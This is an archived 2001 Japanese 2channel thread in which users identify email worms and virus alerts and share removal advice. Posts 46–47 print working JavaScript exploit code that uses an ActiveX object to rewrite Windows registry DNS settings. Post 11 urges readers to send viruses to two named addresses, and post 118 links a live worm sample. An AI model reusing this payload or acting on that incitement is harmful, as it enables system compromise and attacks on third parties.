5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

このウイルス何?

1 :名無しさん@お腹いっぱい。:01/09/05 05:49 ID:icjMmkEE
怪しげなリンク踏んだら、JS.Exception.Exploit ってウイルスが
発見されて修復不可能、ファイルへのアクセスは拒否されましたって、
ノートンが反応したんだけど、このウイルスは一体何なんでしょう?
ヘルプ見てもこのウイルスのことは載ってるんだけど、詳細は載ってない。
ウェブには名前すらなかった。
誰か教えてください。

2 :名も無き冒険者@ネトゲ:01/09/05 06:32 ID:d6f5cd6I
出張中です。
俺も感染してるんだけど、意味不明
JSっていうところから一瞬Just Systemかと
思っちゃうくらいなんの被害も無し。
なんなんでしょうねー??

3 :1:01/09/05 06:41 ID:TbDuVk96
害無しですか。
今のところ何の被害も無いみたいですね。
このまま放置しといても大丈夫かな

4 :これですよ!:01/09/05 07:47 ID:uc8cjlVA
http://www.ipa.go.jp/security/ciadr/20010820java_browser.html

5 :只野藤四郎:01/09/05 08:07 ID:KRnBFhO.
4番さんに賛成。
ただし、このJavaスクリプト用の修復ツールも、
ノートンのヒューリスティックで引っかかります。

あれの亜種が登場しても、おそらくノートンなら検出できることでしょう。

6 :名無しさん@お腹いっぱい。:01/09/08 16:00
age

7 :名無しさん@お腹いっぱい。:01/09/08 19:33
最近糞すれが横行してるな。
ひろゆきの戦略だろうか。

8 :名無しさん@お腹いっぱい。:01/09/08 20:38
ひろゆきなんてまだいるの?
管理能力も無いくせにいらないよ。

9 :これ?:01/09/10 21:31
ttp://www.symantec.com/avcenter/venc/data/js.exception.exploit.html

10 :名無しさん@お腹いっぱい。:01/09/11 11:26
αネットからこんなメールきたけど詳しい事知ってる人いる?

アルファインターネット会員様各位   平成13年9月11日
=======================================================
ウィルス名:VBS.Haptime.A@mm への警告
=======================================================
日頃はアルファインターネットをご利用頂き有難う御座います。
 Microsoft Outlook Express を利用して感染するウィルス
「VBS.Haptime.A@mm」につきまして、多くの被害報告が寄せられています。
 「VBS.Haptime.A@mm」は、拡張子が「.htm」「.html」「.vbs」「.asp」
「.htt」のファイルに感染する Visual Basic Script (VBS) ワームです。
このワームはMAPIオブジェクトを使って増殖し、自分自身を添付した
電子メールを介して感染を広げます。また、Outlook Express のひな
形指定機能を使って、送信されるメール全てに自分自身を添付します。

今後、このウイルス被害が予想されますので「ウイルス警告」とともに
「ウイルスチェック」のご協力をお願い致します。
また、不本意ながら感染が確認された場合には「ウイルスの駆除」をお願い致します。

感染が確認された会員様には「ウイルス駆除依頼」をさせて頂き、
当社への「駆除完了報告」を頂くまでの間は、申し訳御座いませんが
一時的に「IDの停止」をさせて頂きますので予めご了承下さい。
この処置は「ウイルス感染の拡大を最小限にとどめる」為の苦渋の
選択であることをご理解頂ければ幸いです。
=================================================================
 ウィルス「VBS.Haptime.A@mm」の特徴
 ・ Microsoft Outlook Express を利用して感染する
 ・ メールを受信しただけで感染する
 ・ 感染すると、送信するメールすべてにウィルスが添付される
※別名として、以下のようなものがあります。
  VBS.HappyTime、VBS_HAPTIME.A、VBS/Help、VBS/Haptime@MM
ウィルスに感染しないために
 修正プログラムをインストールしていた場合、このワームは自動的には
 動作しません。
 修正プログラムは下記サイトから入手することができます。
http://www.microsoft.com/technet/ie/tools/scrpteye.asp (英語)
 ウィルスに感染してしまったら
 ウィルスを取り除く必要があります。
詳細な情報や、駆除ツールにつきましては、ウィルスワクチンメーカー等のホーム
ページをご参照ください。
----------------------------------------------------------------------------
主なウィルスワクチンメーカー
 トレンドマイクロ株式会社 「ウィルス情報」
 http://www.trendmicro.co.jp/
 株式会社シマンテック
 http://www.symantec.co.jp/
 日本ネットワークアソシエイツ株式会社
 http://www.nai.com/japan/

11 :名無しさん@お腹いっぱい。:01/09/11 13:29
SNOOPY0610@aol.com
meihou@aol.com

どんどんいろんなウィルス送ってやってください。
それとなくわからないように。
破壊してください。お願いします。

12 :名無しさん@お腹いっぱい。:01/09/12 06:44
自分も同じウイルスにかかったんですけど、結局どうすれば、いいんですか?

13 :名無しさん@お腹いっぱい。:01/09/12 17:35
>12
ここ行って、いろいろと参考にしてみ
ttp://natto.2ch.net/test/read.cgi?bbs=pcqa&key=997485641&ls=50

・・・あと一応駆除ツールはここ・・・
ttp://www.symantec.com/region/jp/sarcj/data/v/vbs.haptime.fix.html

14 :12:01/09/12 23:51
>13
おぉ。わざわざ、ありがとうございます。
参考にさせてもらいます。

15 :名無しさん@お腹いっぱい。:01/10/30 22:59
差出人不明のメールにファイルが添付されていた…
DNJDHIDN.exeてのだけど…
なんなんだろ。

16 :名無しさん@お腹いっぱい。:01/10/30 23:09
>>15
タニシ。
別名Hybris

17 :名無しさん@お腹いっぱい。:01/11/26 16:32
以前nimbaをくれた大手サイトのお仲間さんから、
またウイルスらしきものが届いた。

差出人:意味不明(ヘッダでは判明)
件名:意味不明
本文:空白
添付ファイル:IMAGES.DOC.pif、ATT00002.txt

これは一体なんでしょうか・・・。

18 :17:01/11/26 17:20
自己レス。
分かったよ。
W32/Alizだってサ。

19 :名無しさん@お腹いっぱい。:01/11/26 17:27
>>18
Badtransと思われ

20 :17:01/11/26 17:44
>>19
本当だ!ありがとうございます。

21 :名無しさん@お腹いっぱい。:01/11/26 18:01
 今朝からMLで5通ウィルスメールが送られてきました。

http://www.google.com/search?q=cache:RCLAG2zzIIk:www.freeml.com/ml_info.php%3Fml%3Dnetrunner_ml+%83l%83b%83g%83%89%83%93%83i%81%5B+ml&hl=ja&lr=lang_ja

22 :名無しさん@お腹いっぱい。:01/11/26 18:07
http://www.top.or.jp/~godhand/a2.html

これはなんですか?
ソース見てもよくわかりません。

23 :名無しさん@お腹いっぱい。:01/11/26 18:10
>>21
色んな所に貼りつけるな。氏ね。

>>22
直リンは氏ね。

24 :名無しさん@お腹いっぱい。:01/11/26 22:38
>>17
うちにも来たよ。これから流行するのかな?

25 :名無しさん@お腹いっぱい。:01/11/27 16:38
件名に「Re:Ahx」とある添付ファイルが届いたのですが、
これは何でしょうか?
差出人は送った覚えがないそうで、勝手に送られたようです。
訊いてみると「たぶんウイルス」と言っているのですが・・・・・。
いまのところ実害ないです(届いてから5時間経過)。

26 :名無しさん…:01/11/27 16:57
添付ファイル付きのメールが5通くらい送られてきた。
>>25 さんと似てる。
メッセージに"peace"とか書いてた。
東宝、IE5のSP2

さて、これはなんてウィルス?

27 :名無しさん@お腹いっぱい。:01/11/27 17:31
>>26
激しくガイシュツ
http://pc.2ch.net/test/read.cgi/sec/1006306410/

28 :名無しさん…:01/11/27 18:52
>>27 ありがと

29 :25 27:01/11/27 18:59
SP2を当ててるから
「感染はしてない」という認識でいいのかな?
(・∀・)イイ!んだよね・・

30 : :01/11/27 19:00
↑間違った
>>29 = >>26 = >>28

31 :名無しさん@お腹いっぱい。:01/11/27 19:04
>>29
回線切ってから添付ファイルをダブルクリックしてみてくれ。

32 :名無しさん@お腹いっぱい。:01/11/27 19:19
>>30
回線切っててもだぶくりしたら感染するよ、念のため。

33 :29:01/11/27 19:21
プレビューはした
EXEの実行(?)でキャンセルした
ダブルクリックで開いてはいない
メールは削除した

セーフ?

34 :質問:01/11/27 20:00
先程、ウィルスらしきメールが到着。

<件名> Re:
<本文> 空白
<添付> Pics.DOC.scr (29KB) / ATT00056 (0KB)

プレビューすると「ファイルを開いています」のダイアログボックスがいきなり開く。
「キャンセル」クリックで難は逃れた。(当方:Outlook Express 6)

トレンドマイクロで探しきれませんでした。がいしゅつ?新種?

35 :質問:01/11/27 20:01
↑<訂正>↑スマソ
ATT00056 × → ATT00056.TXT ○

36 :名無しさん@お腹いっぱい。:01/11/27 20:06
>>34
Re: というタイトルがあるなら、それはまずいらしいぞえ。
即、削除。

37 :名無しさん@お腹いっぱい。:01/11/27 20:13
>>33
アレってプレビューした時点でコードは走ってるって話だよ。
「開きますか?」ってのは飾りらしい。
#パッチしてない時の話

38 :名無しさん@お腹いっぱい。:01/11/27 20:14
あ、もうプレビューしちゃったのね。。。。。

BADTRANS.B だと思われ。
いいかげん、アウトルック系はやめなはれ。

39 :34:01/11/27 20:23
>>38 (=34 ?)
サンクス。ピンポーンだね。俺は6.0だし、開いてないから大丈夫だった。
(トレンドマイクロ・オンラインスキャンで確認済み)

なんにせよ、アウトルック系やめます。アリガト。

40 :36と38:01/11/27 20:40
>>39 よかた、よかた。ほっ。

41 :こまった・・:01/11/27 21:59
すいません。2つ質問させてください。

==1==
件名          Fw: ASK
添付ファイル      FUN.MP3.pif
本文          無し
というメールが知らない人から届いたのですが、これは
W32/BADTRANS-B, BADTRANS.Bの一種なんでしょうか?

==2==
アウトルック6.0使ってましてプレビューONになっていたのですが
警告表示が出てファイルを開くか、保存するかを聞いて来たのでキャンセルしました。
一応トレンドマイクロのオンラインスキャンを実行してみたんですが、
何もひっかからりませんでした。
これは感染していないと考えて宜しいのでしょうか?

何方かよろしくおねがいします。

42 :名無しさん@お腹いっぱい。:01/11/27 22:26
>>41
1→maybe yes!
2→感染するカモ知れないという前提で根本的対策をお勧めスル。

43 :こまった・・:01/11/27 22:49
42さんありがとうございました。
根本的解決とは、アウトルック以外のソフトを使ったほうが良いと云うことでしょうか?
一応プレビューはOFFの設定にしておきました。

44 :名無しさん@お腹いっぱい。:01/11/27 23:02
>>43
outlookしか使えないより他も使えた方が(・∀・)イイ!ぞ。

45 :JS.Exception.Exploit:01/11/27 23:51
http://www.securiteam.com/
http://www.securiteam.com/exploits/5FP080A5FM.html
http://www.securiteam.com/windowsntfocus/6G00M0K02G.html
http://www.securiteam.com/exploits/archive.html

46 :醤油:01/11/27 23:54

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
try{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-servers.net");
}
catch(e){}
}
catch(e){}
}

47 :醤油の続き:01/11/27 23:56

setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
try{
a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a2.createInstance();Shl = a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
}
catch(e){}
}
catch(e){}
}setTimeout("yuzi2()",1000);
</script>

48 :こまった・・:01/11/28 01:00
>44
そだね。ありがと

49 :名無しさん@お腹いっぱい。:01/11/28 01:11
ネスケのメッセンジャーなら心配いらんの?

50 :教えて!!:01/11/28 01:31
さっき、フリーメールで
"sorry_about_yesterday.MP3.pif"っていう
添付ファイルが知らない人からきてたんだけど
あけないほうがいいよね?!
これってウイルス?!

51 :名無しさん@お腹いっぱい。:01/11/28 02:09
>50
知らない人から添付ファイル来た時点で棄てろよ…

52 :名無しさん@お腹いっぱい。:01/11/28 02:11
>>50
スキャンしてみたら?
http://housecall.antivirus.com/housecall/start_jp.asp

53 :教えて!!:01/11/28 02:56
やってもうたわ。

54 :名無しさん@お腹いっぱい。:01/11/28 03:05
OEでメール受信しようとしたら、ノートン君が電子メール保護機能で受信時点で
aliz君を検出して検疫とかするんだけど、その後のメールの受信自体が完了せず、
何度メール受信してもまた検出しちゃうんだけど、どうなってんだ?
メールは3通サーバにあるみたいなんだけど、何回受信しても1通目の受信中にウィルス検出しちゃって
その後サーバが反応せず、3通のメールが消えないんだけど。。

55 :名無しさん@お腹いっぱい。:01/11/28 03:21
>>54
プロバのホームページからログインして削除できない?

56 :54:01/11/28 03:30
>>55
うーむ、プロバにそのような機能はないようなんすけど、どうやんだろ。。
ちなみにプロバは灰道。。

57 :名無しさん@お腹いっぱい。:01/11/28 03:33
>>56
何処のプロバ?

58 :名無しさん@お腹いっぱい。:01/11/28 03:33
灰道って何???????????????????

59 :名無しさん@お腹いっぱい。:01/11/28 03:36
>54
ベクターに受信前のメール削除できるやつあるぞ。

60 :名無しさん@お腹いっぱい。:01/11/28 03:36
というわけで解決!

61 :54:01/11/28 04:07
解決!はしてないけど、プロバ障害の可能性もあるかも、、
昼間やって変わんなかったら、プロバに聞いてみるよ。

62 :名無しさん@お腹いっぱい。:01/11/28 04:41
結局「灰道」って何なのさ?

63 :名無しさん@お腹いっぱい。:01/11/28 04:42
NAV2001での場合
オプションーインターネットー電子メール保護ー拡張で
電子メールスキャンを時間切れから保護するのチェックは
外れてない

的外れならゴメソ

64 ::01/11/28 10:02
ハイウェイだろ

65 :名無しさん@お腹いっぱい。:01/11/28 11:00
昨日の夜から既に5通、
タイトルがRE: だけで、本文も添付ファイルもないメールが届いているんですが。
全部知らない人からで。HPで公開しているメアドなんで
知らない人から来てもフシギではないんですが。
ウィルスは今まで届いたことなかったし、
半日で5通というのは多いなーと思うんですが
これはなんでしょう??

66 :名無しさん@お腹いっぱい。:01/11/28 12:10
>65
http://pc.2ch.net/test/read.cgi/sec/1006787500/

67 :東京地裁は役立たず!:01/11/28 12:20
日本生命の削除依頼公開スレッド

1 :ひろゆき@暫定管理人 ★ :01/11/01 15:49 ID:???
「削除依頼は公開」の原則に従って削除したものを公開してますー。
ソース。
http://www.dd.iij4u.or.jp/~cap/nissei/

14 :名無しさん@お腹いっぱい。 :01/11/01 15:59 ID:I8TSGCyI
むしろこのGIFを保存しといてそこらにミラー作りまくるのが
2chねらの使命かと

15 :名無しさん@お腹いっぱい。 :01/11/01 16:00 ID:pX4yzwVD
>>10 つか、それがひろゆきのねらいだろ

16 :名無しさん :01/11/01 16:00 ID:4XQtcOuc
オイラはとりあえず保存しといたよ

17 :ひろゆき@暫定管理人 ★ :01/11/01 16:01 ID:???
いやぁ、削除依頼は公開って原則ですから、、
( ̄ー ̄)ニヤリ

18 :va :01/11/01 16:01 ID:+W2rWnl4
同じこと書き込んだら、速攻で削除されるのかな?

68 :名無しさん@お腹いっぱい。:01/11/29 00:21
>>50
あ、俺も来たわ。2通。
1通は知り合い(俺からメールを送った時の件名で)から。
もう1つは「Makiko Tanaka」からだった(w

69 :教えて!!:01/11/29 00:36
で、どうなった〜?!
あたし、グーのフリーメールをプレビューしてもうてんけど
何も変化はなさそ〜。あなたはどう?!>68

70 :名無しさん@お腹いっぱい。:01/11/29 00:41
友人から添付ファイルが来た。
開くと文章はなくHAMSTER.DOCとATT00019ってファイルが。
これってウイルスですか。どなたか助言お願いします。

71 :名無しさん@お腹いっぱい。:01/11/29 00:45
>>70
はい当たりです。

72 :名無しさん@お腹いっぱい。:01/11/29 00:48
>>70
はい。
スレあります。
BADTRANS.B Re: メール
http://pc.2ch.net/test/read.cgi/sec/1006787500/l50

73 :名無しさん@お腹いっぱい。:01/11/29 03:08
誰からもメールがこねぇ(;;)

74 :名無しさん@お腹いっぱい。:01/11/29 16:44
>>69
とりあえず、速攻破棄したんで感染はしてないと思います。
自分のメールは自宅サーバーのなんで、サーバーのログを調べてみたけど怪しいところはなかった。
あんまり感染力はないのかな?
今日、学校で友人に聞いたら二人ほど同じメールが来てたって言ってた。

75 :名無しさん@お腹いっぱい。:01/11/29 16:49
>74
プレビューしたのに「破棄したから感染してない」って…(´д`;)
ウィルスチェックしろよ〜…

76 :名無しさん@お腹いっぱい:01/11/30 11:05
質問です。11/26に変なメールが着ました。
全然知らないメアドの人から意味不明のメールが二通。
件名は「Nice shit i found」「Fw: Re: some website for you!」です。
メール内容はプログラムなのか、アルファベットがイパーイ並んでました。
二通とも本文始めに「This is a multi-part message in MIME format」
と書かれてました。
コレってウイルスが含まれたメールなのでしょうか?
どなたか教えてください、お願いします!

77 :名無しさん@お腹いっぱい。:01/11/30 13:01
>>76
そうです。多分Alizというウイルスでしょう。

78 :名無しさん@お腹いっぱい。:01/11/30 16:14
>76
添付ファイルがデコードされていないのかな?

79 :名無しさん@お腹いっぱい。:01/11/30 17:48
どなたか教えてください。
W32.Badtrans@mm.enc ってどんなウイルスですか?

80 :名無しさん@お腹いっぱい。:01/11/30 19:53
>79
お前はこのページの上の方にでかでかと書いてある文字すら読めんのか。

W32.Badtransウイルス大流行です。
シマンテック
トレンドマイクロ

リンクたどってこいおばか。

81 :79:01/11/30 22:41
>80
おバカな質問ごめんなさい(汗

「W32.Badtransウイルス大流行」というのは知っていました。
というのも、ここ4日間、毎日5〜10通ほど
W32.Badtrans.B@mm(BADTRANS.B)が届いてたので。
でも今日はじめて 「W32.Badtrans@mm.enc」
というウイルスが届いて、たったいまも届いたのですが・・・。

たしか今流行ってるのはW32.Badtrans.B@mm(BADTRANS.B)と
W32.Aliz.Worm(BADTRANS.A)だけでは?と思ったんです。
NAVの反応も今までとちょっと違っていたので
なおさら気になり、一応ここに書く前に自分でも
どんな被害があるのか、また、このウイルスの特徴など
ネット検索したりしたのですがさっぱりわからなくて・・・
ここならどなたかご存知ないかとおもっての質問でした。

これもBやAと同じような対応?でいいんですよね?

本当に無知でごめんなさい。

82 :76:01/11/30 23:16
返答ありがとうございました。
私のメーラーがHTMLメール非対応だった為、本文が全て文字化けして届い
てました。添付ファイルもありませんでした。
内容に<HTML><HEAD></HEAD><BODY><iframe src=3Dcid:SOMECID
height=3D0 width=3D0></iframe><font>peace</font></BODY>
</HTML>とあったんで、Alizに間違いなさそう。
でもなんで添付ファイルがなかったのが謎・・・。

83 :名無しさん@お腹いっぱい。:01/11/30 23:33
Alizの解決方法きぼん。

84 :名無しさん@お腹いっぱい。:01/12/01 19:47
質問です。
全然知らないメアドから1通。
件名は「ア・ソ・」←文字化け?差出人は「aida sin」です。
そのメールにカーソル合わせて削除しようとしたが強制終了。
なんとか削除したのですがそに日にメール送った人に同じようなメールが届いていたららしいです。
コレってウイルスなのでしょうか?
どなたか教えてください、お願いします!

85 :Bear!!@Taipei:01/12/01 19:51
>>82
その文字化け文字の固まりが添付ファイル(Virus本体)です..

それから、そのまま削除したから..と書いている人がいますが、
OutLookExpressでプレビュー表示(件名を選択する
と本文が下の欄に表示される)が有効の場合だと、SP2にUpd
ateしてあっても件名を選択した時点で実行されてしまいます。
削除はその後行われることになるので、全然安全ではありません。

先にプレビュー表示を無効に(表示-レイアウト-プレビューウイン
ドウ-プレビューウィンドウを表示するのチェックを外す。)してか
ら、件名を選択して中味を見ずに削除してください。

プレビュー表示を止めると、流し読みができなくなって不便ですが、
Virus感染するよりマシなので、我慢しましょう。

たいていのVirusは日本以外で製作されているため、件名が日
本語ではないケースが多いです。ある程度カンで削除するしかない
のがつらいところです。

86 :Bear!!@Taipei:01/12/01 19:56
>>84
Virusが既に実行された可能性があります。

Symantec日本のサイトに
BadTrans.BとAlizについて詳しい情報が
あるので、参考にしてください。
http://www.symantec.co.jp/region/jp/sarcj/index.html

自分で駆除することもできますが、レジストリを書き換えるなど
操作を誤ると危ないところもあるので、PCに詳しい知人がいる
なら、頼んだほうが良いと思います。

87 :名無しさん@お腹いっぱい。:01/12/01 20:06
>>86
どんなウイルスにかかったかわからないんのですか?

88 :Bear!!@Taipei:01/12/01 21:08
ADSLユーザーが増えており私の周囲で被害が拡大しているので、
VirusネタではありませんがそのことについてUpします。(長文)

■IISかPersonalWebServerをセットアップしているPC
(知らずにそうなっているかも知れません。)
一緒にセットアップされるサンプルスクリプトの中に、インターネッ
ト側からPCのコマンドを実行してしまう「CMD.EXE」が起動
できるもの(セキュリティホール)が含まれています。

日本だと、一日に数回はインターネット側からハッキングツールでこ
のセキュリティホールを探られます。
(台湾では20分間隔..パッチをダウンロード中にもノックあり)

その状況(cmd.exe で Dirコマンドが実行できることを確認するパタ
ーンが多い)が続くと、「いつでも使える管理不在のお宝」と判断され、
Virus配布やSpam発信用のスクリプトを送りこまれます。
(CordRed、Nimdaの侵入手口)

不安な方は、スタート-検索-ファイルやフォルダを使用して、
「in*.log」(IISのログ)を検索してみてください。
もし、サイズが妙に大きくて 内容にcmd.exeやadmin.dllが含まれて
いるようなら、探られたりコントロール権を取られそうな状況です。
ちなみに、CodeRedが進入している場合は、XXXXXXXと
いう内容に書き換えられ、実行されたスクリプトは隠蔽されます。

被害に企業・個人の区別はありません。急に不調になったPCがあれ
ば、Virus被害の確認と一緒に併せてチェックしてみてください。

89 :Bear!!@Taipei:01/12/01 21:33
>>87
まだVirus対策ソフトが何も入っていないなら、先ほど紹介した
Symantec日本のサイト http://www.symantec.co.jp の右下
の方にある「体験版ダウンロード」を利用することをお勧めします。

30日限定ですが、製品版と同じ能力でVirusを検索・駆除するこ
とができます。

ブランドPCに添付されているVirus対策ソフトを過信しないほう
が良いでしょう。他のVirus対策ソフトで自分のPCに潜むVir
usの有無を一度は確認しておいたほうが良いですよ。

※他のVirus対策ソフトが入っている場合は、コントロールパネル
-アプリケーションの追加と削除で先に削除しておかないと、セットア
ップに失敗したり、最悪起動不能になることがあります。また、2種同
時に動かすとスキャンがかなり遅くなってしまいます。もう一方を停止
してください。
(削除したVirus対策ソフトは期限切れになった時にい再セットア
ップする必要があるので、セットアップ方法を確認しておいてください
ね。)

90 :名無しさん:01/12/03 01:20
New_Napster_Site.MP3.pif これはなに 

91 :名無しさん@お腹いっぱい。:01/12/03 01:29
>>90
それ、家にもきたよ。
開いたら、過去の受信メールなどが一旦消滅した。

92 :名無しさん@お腹いっぱい。:01/12/03 01:32
>>90
ウイルス。。Badtrans
漏れの添付ファイル名脳みそデータベースから逝くと。

いやはや、MTXの添付ファイル名と寸前でカブる(W
MP3が「txt」なだけぢゃん。
まるで同じの使ってたら混乱したろうに。。。

93 :名無しさん@お腹いっぱい。:01/12/03 01:38
>90
さっき同じのが来ました。
昨日までウィルスバスターがブロックしてたのにすり抜けたみたい。
亜種なんだろうか?

94 :名無しさん@お腹いっぱい。:01/12/03 01:54
詳しくは、New_Napster_Site.MP3.pif (38k)text5.text(ob)
添付ファイル名 -EA4DMGBP9D
西ヨーロッパから来日、なのにOCN、
喜んで、デスクトップに保存した私…

95 :名無しさん@お腹いっぱい。:01/12/03 02:03
>>94
そりゃ、文字コードISOだろに、、、、
はぁ〜〜〜

96 :名無しさん@お腹いっぱい。:01/12/03 02:46
>>93
Badtrans.Bトレンドマイクロの記述↓
ただし、ウイルスコードのバグのためか添付ファイルのエンコード情報
が正常に記述されない状態でメール送信を行う場合があることが確認さ
れています。この場合、添付ファイルは正常にデコードできず言わば壊
れて実行不可能な状態になりますので、ウイルス活動の危険もありません。
↑この辺の壊れ加減見てみないと何も言えない。。>亜種?

というか、アンチウイルスサイトの解析依頼に廻して見たら??

97 :あぼーん:あぼーん
あぼーん

98 :名無しさん@お腹いっぱい。:01/12/03 04:03
> Content-Type: audio/x-wav;
> name="info.DOC.scr"
> Content-Transfer-Encoding: base64
> Content-ID: <EA4DMGBP9p>

なんかこんなのがきたんだけど、古風なnimda?
スクリーンセーバーってのが渋いと思って。

99 :初心者的:01/12/05 11:02
詳しい方にお伺いしますが
たまに添付ファイルで見慣れない方から
DELREG.EXEが添付されてメールがくるのですが・・・。
これもウィルスですか?
納頓が赤い画面で警告するので開いてみたことはありませんが・・・。

100 :名無しさん@お腹いっぱい。:01/12/05 12:33
>>99
magistrとみた。
スキャンして正解を教えてちょ。

101 ::01/12/05 14:37
自分の名前を隠してメールおくりたいいですが
どうしたらようでしょうか…?

102 :名無しさん@お腹いっぱい。:01/12/05 17:05
>>101
名前を名乗らなければ?

103 :わからん:01/12/05 23:34
>>100
いや、何も出ないんだな、これが。
春先からきてるから、それではないと思うのだが。
これでもう今年は10種類超えたな。
確かにウィルスとの接触?増えたと思うよ。

104 :名無しさん@お腹いっぱい。:01/12/06 01:19
 件名も相手アドレスも本文も空白で、単に「IBNDMGIB.EXE」という
添付ファイルがあるだけのメールが届いたり。
 ewb検索しても引っかからないし、なんですかね、コレ。

105 :名無しさん@お腹いっぱい。:01/12/06 01:45
>>104
Hybris

106 :名無しさん@お腹いっぱい。:01/12/06 01:48
>>104
漏れの脳みそ添付ファイル名ヒステリクスキャンに因ると、、、、
、、、、Hybris。

・・大丈夫ダ。最新バイオチップ積んでるから。
漏れ自身は100パー信頼置いてる。

107 : :01/12/06 01:56
>>104

私もさっき届きました
ウイルスバスターオンラインスキャンしたけど検出されず
このウイルスはプレビュー大丈夫なのかな

Hybrisってやつなんですかぁ
とりあえず調べてみます

108 :名無しさん@お腹いっぱい。:01/12/06 05:33
>>105
 ありがとう。
 そいえばそんなのもあったかと思いだし。
 ウィルスごとデコードされてて保存できなかったよ…。不活性
ウィルスって滅菌された乳酸菌飲料みたくてマンセー。

109 :名無しさん:01/12/06 07:19
トロイ システムクリーナーとはどんなウイルスでしょうか
トレンドマイクロのオンラインスキャンで見つかったのですが説明どうりに途中でやめて再起動しました
するとコマンドプロンプトの画面が一瞬表示されました
そしてそのあともう一度オンラインスキャンをかけましたが今度はなにも出ませんでした
手順はこれでよかったのでしょうか
あともし駆除されてなかったらどんな被害にあうのでしょうか
よろしくお願いします

110 :hanajan@特科連χ ◆VHcVn9bM :01/12/06 07:24
>>109
これで良いです。

但し、パターンの更新を行う為に、キャッシュを空にしてから、オンラインスキャンを実行しないと正しい結果は得られません。

111 :名無しさん:01/12/06 07:35
さっそくのレスありがとうございます
キャッシュを空にしてからもう一度やってみます

112 : :01/12/06 15:08
JS.play_a

何だこれは?

113 :名無しさん@お腹いっぱい。:01/12/06 20:42
JS.play_aではなく、JS_pray.aでは?

114 : :01/12/07 00:44
112です。

>>113
トレンドマイクロのオンラインスキャンのログ(TSC.LOG)より。
Found Trojan: JS_PLAY.A
でした。

ネットワークで繋がってるすべてのPCから検出されました。
最近操作していないPC(サーバとかUDが動いてるPC)からも検出されてるので
どういうルートで入ってきたかまったく不明です。

何をするトロイなんでしょう?

115 :なんでしょう:01/12/07 16:28
>>114
私のPCにもJS_PLAY.Aとでてきました。
同じくトレンドマイクロのオンラインスキャンでです
なんの症状も無いようにおもうのですが???
だれかわかる方お教え下さい。
宜しくお願い致します。

116 :名無しさん@お腹いっぱい。:01/12/07 16:31
JS_PLAY.A
http://pc.2ch.net/test/read.cgi/sec/1007695475/l50

117 :名無しさん@お腹いっぱい。:01/12/07 18:40
>>116
逆だと思うのだが

118 :名無しさん@お腹いっぱい。:01/12/08 00:52
知人からウィルスが送られてきました。
私は感染していないのですが、念のため調べたいと思ってます。

特徴は差出人アドレスが
元の***@****.***
から
_***@****.***
に変えられている。

添付ファイルは*.htmlと*.srcで
html表示でsrcを実行するもの。

こんな感じですが古いウィルスバスター2001
では検出も特定も出来ませんでした。
http://www.geocities.com/kyhft6/baikin.zip
↑ここに上げといたので検出・特定できる人いたら
参考までに何か教えてもらえないでしょうか?
(一応.srcを.sr_に変えときました)
もしかしたらがいしゅつかもしれませんが
全部は見れてません。
宜しくお願いします。

119 :名無しさん@お腹いっぱい。:01/12/08 01:00
>>118
I-Worm/BadTrans

120 :118:01/12/08 01:27
>>119
情報有難うございます。
とりあえずこれ試して見ます。
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.removal.tool.html

121 :118:01/12/08 03:11
元ファイルにちゃんと反応し、感染もしてませんでした。
有難うございました。
2ちゃんで警告されてるのとは違う物だと思ってました。
こんなに深刻だとは・・・

122 :名無しさん@お腹いっぱい。:01/12/08 16:37
教えてください。

w32.Sircam.Worm@mm(Backdoor.SirCam)付きのメールをもらいました。
シマンテックのウイルス辞典だと、アドレス帳にあるアドレスにメールするようなのですが、
Badtrans.BのようにIEのキャッシュフォルダから拾うことがあるのでしょうか?

私のホームページは日文だけで、台湾や中国在住の人に心当たりがないのです。

123 :名無しさん@お腹いっぱい。:01/12/08 18:15
私もJS_PLAY.Aが検出された・・・。
初めてだったのでビクーリしたよ・・・。
で、トロイとかよくわかんないんだけど、どうすりゃいいの?
そのままでいいのかな?

124 :名無しさん@お腹いっぱい。:01/12/09 15:48
OutlookExpressを使ってるんですけど
Badtransが来たらしく、プレビューをオンにしてたため強制終了されました。
Badtransの駆除と免疫ツールがあったので試したんですが、検出されず・・
で、ウィルスバスターでOutlook添付ファイルを検索したら、
サーカムとJOKE_CHASEMEとHybris、それにBadtrans.Bが検出されました(藁)

ひとまず感染はしてない(?)ようなのですが、
問題のメールは受信箱の一番上にあるので、
起動したとたん強制終了されて、捨てられません。
どうすればいいでしょうか?
Outlookを経由しないで受信箱を操作できる方法ないかな・・?

125 :124:01/12/09 15:49
あ、もしかしてBadtransスレの方がよかったのかな・・?

126 :名無しさん@お腹いっぱい。:01/12/10 02:13
ねぇ、さっきトレンドマイクロのオンラインスキャンしたんだけど、
また「JS_PLAY.A」が検出されたよ・・・。
何で?

このウイルス(?)トロイ(?)って何なのー!!??

127 :名無しさん@お腹いっぱい。:01/12/10 16:21
Bad trans、最近減ってきたなーと思ってたんだけど今日また受信した。
ファイルサイズは40k
添付ファイルネームはPics.doc.scr
サブジェクトはRe:
送信者は知らない人だけど頭に_がついてる

どう見たってBad transなのに…ノートン先生が起動しなかった。
いつもなら検疫するか訊かれるのになー。
ウィルスチェックしても「ウィルスは検出されませんでした」って言われるし。

なんなんだろうこれ。

128 :名無しさん@お腹いっぱい。:01/12/10 18:09


129 :名無しさん@お腹いっぱい。:01/12/10 22:35
>>126
JS_PLAY.AはJAVAスクリプト

130 :名無しさん@お腹いっぱい。:01/12/11 00:57
下のような本文で全然知らない人から700KBの添付ファイル
が届いたのですけど、(添付ファイル名は顧客.xls.lnk)
(用件は文字化けしている文字)
差出人に問い合わせしたらこちらからは送信していないとの
